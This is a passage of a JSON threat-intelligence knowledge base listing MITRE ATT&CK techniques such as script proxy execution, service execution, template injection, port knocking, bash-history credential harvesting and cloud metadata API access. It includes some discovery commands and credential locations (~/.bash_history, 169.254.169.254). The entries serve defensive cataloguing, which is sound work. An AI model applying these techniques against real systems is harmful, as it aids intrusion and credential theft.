"source": "MITRE",
"technique_attack_id": "T1216.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "f46405a6-b9a3-4124-8bce-5a786038f28f",
"value": "PubPrn"
},
{
"description": "Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.<sup>[[LOLBAS Project](https://app.tidalcyber.com/references/14b1d3ab-8508-4946-9913-17e667956064)]</sup> This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.<sup>[[GitHub Ultimate AppLocker Bypass List](https://app.tidalcyber.com/references/a2fa7fb8-ddba-44cf-878f-448fb2aa6149)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "f46405a6-b9a3-4124-8bce-5a786038f28f",
"type": "similar"
}
],
"uuid": "e0d1825e-e46a-48f2-9b28-8346a39d39b0",
"value": "System Script Proxy Execution"
},
{
"description": "Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.\n\nAdversaries may use the information from [System Service Discovery](https://app.tidalcyber.com/technique/e0a347e2-2ac5-458b-ab0f-18d81b6d6055) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "e0a347e2-2ac5-458b-ab0f-18d81b6d6055",
"value": "System Service Discovery"
},
{
"description": "Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.<sup>[[Launchctl Man](https://app.tidalcyber.com/references/26bd50ba-c359-4804-b574-7ec731b37fa6)]</sup>\n\nAdversaries use launchctl to execute commands and programs as [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00)s or [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)s. Common subcommands include: <code>launchctl load</code>,<code>launchctl unload</code>, and <code>launchctl start</code>. Adversaries can use scripts or manually run the commands <code>launchctl load -w \"%s/Library/LaunchAgents/%s\"</code> or <code>/bin/launchctl load</code> to execute [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00)s or [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)s.<sup>[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)]</sup><sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>\n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1569.001"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "8edc6345-c423-4872-9e22-11e22d9164ff",
"value": "Launchctl"
},
{
"description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.<sup>[[Microsoft Service Control Manager](https://app.tidalcyber.com/references/00d22c6d-a51a-4107-bf75-53ec3330db92)]</sup> The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc).\n\n[PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.<sup>[[Russinovich Sysinternals](https://app.tidalcyber.com/references/72d27aca-62c5-4e96-9977-c41951aaa888)]</sup> Tools such as [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) and <code>sc.exe</code> can accept remote servers as arguments and may be used to conduct remote execution.\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://app.tidalcyber.com/technique/31c6dd3c-3eb2-46a9-ab85-9e8e145810a1) during service persistence or privilege escalation.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1569.002"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "68427c7d-f65a-4545-abfd-13d69e5e50cf",
"value": "Service Execution"
},
{
"description": "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://app.tidalcyber.com/technique/f8aa018b-5134-4201-87f2-e55d20f40b17)), but adversaries can also abuse services for one-time or temporary execution.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
},
{
"dest-uuid": "8edc6345-c423-4872-9e22-11e22d9164ff",
"type": "similar"
},
{
"dest-uuid": "68427c7d-f65a-4545-abfd-13d69e5e50cf",
"type": "similar"
}
],
"uuid": "a2300ed3-a502-4fe4-bad5-4aa1efc72941",
"value": "System Services"
},
{
"description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) (e.g. <code>reload</code>).<sup>[[Microsoft Shutdown Oct 2017](https://app.tidalcyber.com/references/c587f021-596a-4e63-ac51-afa2793a859d)]</sup><sup>[[alert_TA18_106A](https://app.tidalcyber.com/references/26b520dc-5c68-40f4-82fb-366d27fc0c2f)]</sup>\n\nShutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) or [Inhibit System Recovery](https://app.tidalcyber.com/technique/d207c03b-fbe7-420e-a053-339f4650c043), to hasten the intended effects on system availability.<sup>[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "24787dca-6afd-4ab3-ab6c-32e9486ec418",
"value": "System Shutdown/Reboot"
},
{
"description": "An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. <sup>[[MSDN System Time](https://app.tidalcyber.com/references/5e15e03b-be8b-4f3d-a3ae-0df7a4ecfbec)]</sup><sup>[[Technet Windows Time Service](https://app.tidalcyber.com/references/0d908e07-abc1-40fc-b147-9b9fd483b262)]</sup>\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) on Windows by performing <code>net time \\\\hostname</code> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>.<sup>[[Technet Windows Time Service](https://app.tidalcyber.com/references/0d908e07-abc1-40fc-b147-9b9fd483b262)]</sup>\n\nOn network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `show clock detail` can be used to see the current time configuration.<sup>[[show_clock_detail_cisco_cmd](https://app.tidalcyber.com/references/a2215813-31b0-5624-92d8-479e7bd1a30b)]</sup>\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8)<sup>[[RSA EU12 They're Inside](https://app.tidalcyber.com/references/8330ab88-9c73-4332-97d6-c1fb95b1a155)]</sup>, or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://app.tidalcyber.com/technique/90e6a093-3e87-4d74-8b68-38c7d7e5e93c)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.<sup>[[AnyRun TimeBomb](https://app.tidalcyber.com/references/cd369bf9-80a8-426f-a0aa-c9745b40696c)]</sup>",
"meta": {
"platforms": [
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "2e634ff1-a4ea-41b4-8ee9-23db4627a986",
"value": "System Time Discovery"
},
{
"description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://app.tidalcyber.com/technique/bfde0a09-8109-41e4-b8c9-68fe20e8131b) of directory .LNK files that use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to look like the real directories, which are hidden through [Hidden Files and Directories](https://app.tidalcyber.com/technique/14e81a2d-9eca-429c-9fb9-08e109de9f6c). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. <sup>[[Retwin Directory Share Pivot](https://app.tidalcyber.com/references/027c5274-6b61-447a-9058-edb844f112dd)]</sup>\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "58987d0d-2ebf-4783-90ac-5164fe9b9e43",
"value": "Taint Shared Content"
},
{
"description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsofts Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.<sup>[[Microsoft Open XML July 2017](https://app.tidalcyber.com/references/8145f894-6477-4629-81de-1dd26070ee0a)]</sup>\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.<sup>[[SANS Brian Wiltse Template Injection](https://app.tidalcyber.com/references/8c010c87-865b-4168-87a7-4a24db413def)]</sup> These documents can be delivered via other techniques such as [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) and/or [Taint Shared Content](https://app.tidalcyber.com/technique/58987d0d-2ebf-4783-90ac-5164fe9b9e43) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.<sup>[[Redxorblue Remote Template Injection](https://app.tidalcyber.com/references/bce1cd78-b55e-40cf-8a90-64240db867ac)]</sup> Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.<sup>[[MalwareBytes Template Injection OCT 2017](https://app.tidalcyber.com/references/7ef0ab1f-c7d6-46fe-b489-fab4db623e0a)]</sup>\n\nAdversaries may also modify the <code>*\\template</code> control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.<sup>[[Proofpoint RTF Injection](https://app.tidalcyber.com/references/8deb6edb-293f-4b9d-882a-541675864eb5)]</sup><sup>[[Ciberseguridad Decoding malicious RTF files](https://app.tidalcyber.com/references/82d2451b-300f-4891-b1e7-ade53dff1126)]</sup>\n\nThis technique may also enable [Forced Authentication](https://app.tidalcyber.com/technique/e732e1d4-fffa-4fc3-b387-47782c821688) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.<sup>[[Anomali Template Injection MAR 2018](https://app.tidalcyber.com/references/3cdeb2a2-9582-4725-a132-6503dbe04e1d)]</sup><sup>[[Talos Template Injection July 2017](https://app.tidalcyber.com/references/175ea537-2a94-42c7-a83b-bec8906ee6b9)]</sup><sup>[[ryhanson phishery SEPT 2016](https://app.tidalcyber.com/references/7e643cf0-5df7-455d-add7-2342f36bdbcb)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "02b8e7c1-0db7-43f5-a5bc-531b30395122",
"value": "Template Injection"
},
{
"description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r <sup>[[Hartrell cd00r 2002](https://app.tidalcyber.com/references/739e6517-10f5-484d-8000-8818d63e7341)]</sup>, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1205.001"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "34a112db-c61d-4ea2-872f-de3fc1af87a3",
"value": "Port Knocking"
},
{
"description": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.\n\nTo establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.<sup>[[haking9 libpcap network sniffing](https://app.tidalcyber.com/references/2803d0b8-78ee-4b19-aad3-daf84cd292b5)]</sup> Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://app.tidalcyber.com/technique/bd677092-d197-4230-b94a-438cb24260fd).<sup>[[exatrack bpf filters passive backdoors](https://app.tidalcyber.com/references/84ffd130-97b9-4bbf-bc3e-42accdf248ce)]</sup><sup>[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]</sup>\n\nFilters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1205.002"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "f0dd515b-51cf-4853-a20c-02226d099ee0",
"value": "Socket Filters"
},
{
"description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://app.tidalcyber.com/technique/34a112db-c61d-4ea2-872f-de3fc1af87a3)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r <sup>[[Hartrell cd00r 2002](https://app.tidalcyber.com/references/739e6517-10f5-484d-8000-8818d63e7341)]</sup>, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.\n\nOn network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://app.tidalcyber.com/technique/195aa08b-15fd-4019-b905-8f31bc5e2094) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup><sup>[[Mandiant - Synful Knock](https://app.tidalcyber.com/references/1f6eaa98-9184-4341-8634-5512a9c632dd)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup> To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f) due to the monolithic nature of the architecture.\n\nAdversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.<sup>[[Bleeping Computer - Ryuk WoL](https://app.tidalcyber.com/references/f6670b73-4d57-4aad-8264-1d42d585e280)]</sup><sup>[[AMD Magic Packet](https://app.tidalcyber.com/references/06d36dea-e13d-48c4-b6d6-0c175c379f5b)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
},
{
"dest-uuid": "34a112db-c61d-4ea2-872f-de3fc1af87a3",
"type": "similar"
},
{
"dest-uuid": "f0dd515b-51cf-4853-a20c-02226d099ee0",
"type": "similar"
}
],
"uuid": "c2cf211a-9676-4922-a386-69697ab4934a",
"value": "Traffic Signaling"
},
{
"description": "Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.\n\nA defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.\n\nIncidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.<sup>[[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)]</sup> ",
"meta": {
"platforms": [
"IaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "ab4f22d6-465f-4a16-8a40-693f2234c4ac",
"value": "Transfer Data to Cloud Account"
},
{
"description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.<sup>[[MSDN MSBuild](https://app.tidalcyber.com/references/9ad54187-84b0-47f9-af6e-c3753452e470)]</sup>\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.<sup>[[MSDN MSBuild](https://app.tidalcyber.com/references/9ad54187-84b0-47f9-af6e-c3753452e470)]</sup><sup>[[Microsoft MSBuild Inline Tasks 2017](https://app.tidalcyber.com/references/2c638ca5-c7e2-4c4e-bb9c-e36d14899ca8)]</sup> MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.<sup>[[LOLBAS Msbuild](https://app.tidalcyber.com/references/de8e0741-255b-4c41-ba50-248ac5acc325)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1127.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "4aa6466a-f7ca-4dae-b272-73ca23f0df8f",
"value": "MSBuild"
},
{
"description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.<sup>[[engima0x3 DNX Bypass](https://app.tidalcyber.com/references/e0186f1d-100d-4e52-b6f7-0a7e1c1a35f0)]</sup><sup>[[engima0x3 RCSI Bypass](https://app.tidalcyber.com/references/0b815bd9-6c7f-4bd8-9031-667fa6252f89)]</sup><sup>[[Exploit Monday WinDbg](https://app.tidalcyber.com/references/abd5f871-e12e-4355-af72-d4be79cb0291)]</sup><sup>[[LOLBAS Tracker](https://app.tidalcyber.com/references/f0e368f1-3347-41ef-91fb-995c3cb07707)]</sup> These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "4aa6466a-f7ca-4dae-b272-73ca23f0df8f",
"type": "similar"
}
],
"uuid": "8811114c-a0cf-479c-b95d-c036467749e3",
"value": "Trusted Developer Utilities Proxy Execution"
},
{
"description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) used by the other party for access to internal network systems may be compromised and used.<sup>[[CISA IT Service Providers](https://app.tidalcyber.com/references/b8bee7f9-155e-4765-9492-01182e4435b7)]</sup>\n\nIn Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.<sup>[[Office 365 Delegated Administration](https://app.tidalcyber.com/references/fa0ed0fd-bf57-4a0f-9370-e22f27b20e42)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "7549c2f9-b5d2-4773-90ed-42f668aecacf",
"value": "Trusted Relationship"
},
{
"description": "Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the users <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the users last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. <sup>[[External to DA, the OS X Way](https://app.tidalcyber.com/references/b714e6a9-5c12-4a3b-89f9-d379c0284f06)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1552.003"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "065d1cca-8ca5-4f8b-a333-2340706f589e",
"value": "Bash History"
},
{
"description": "Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.\n\nRather than accessing the stored chat logs (i.e., [Credentials In Files](https://app.tidalcyber.com/technique/838c5038-91e7-4648-925e-a142c8c10853)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation <sup>[[Slack Security Risks](https://app.tidalcyber.com/references/4332430a-0dec-5942-88ce-21f6d02cc9a9)]</sup>.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1552.008"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "8e9cfd62-1a61-50dc-8f05-8a4914fd3853",
"value": "Chat Messages"
},
{
"description": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\n\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.<sup>[[AWS Instance Metadata API](https://app.tidalcyber.com/references/54a17f92-d73d-469f-87b3-34fb633bd9ed)]</sup> A cloud metadata API has been used in at least one high profile compromise.<sup>[[Krebs Capital One August 2019](https://app.tidalcyber.com/references/7d917231-735c-40d8-806d-7fee60d2f996)]</sup>\n\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.<sup>[[RedLock Instance Metadata API 2018](https://app.tidalcyber.com/references/f85fa206-d5bf-41fc-a521-01ad6281bee7)]</sup>\n\nThe de facto standard across cloud service providers is to host the Instance Metadata API at <code>http[:]//169.254.169.254</code>.\n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1552.005"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "a5a95893-d837-424a-979f-095a47dd9f34",
"value": "Cloud Instance Metadata API"
},
{
"description": "Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.<sup>[[Docker API](https://app.tidalcyber.com/references/b8ec1e37-7286-40e8-9577-ff9c54801086)]</sup><sup>[[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)]</sup>\n\nAn adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.<sup>[[Unit 42 Unsecured Docker Daemons](https://app.tidalcyber.com/references/efcbbbdd-9af1-46c2-8538-3fd22f2b67d2)]</sup> An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1552.007"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "6f6b88df-039c-4b69-87e0-97dfabbb49d8",
"value": "Container API"
},
{
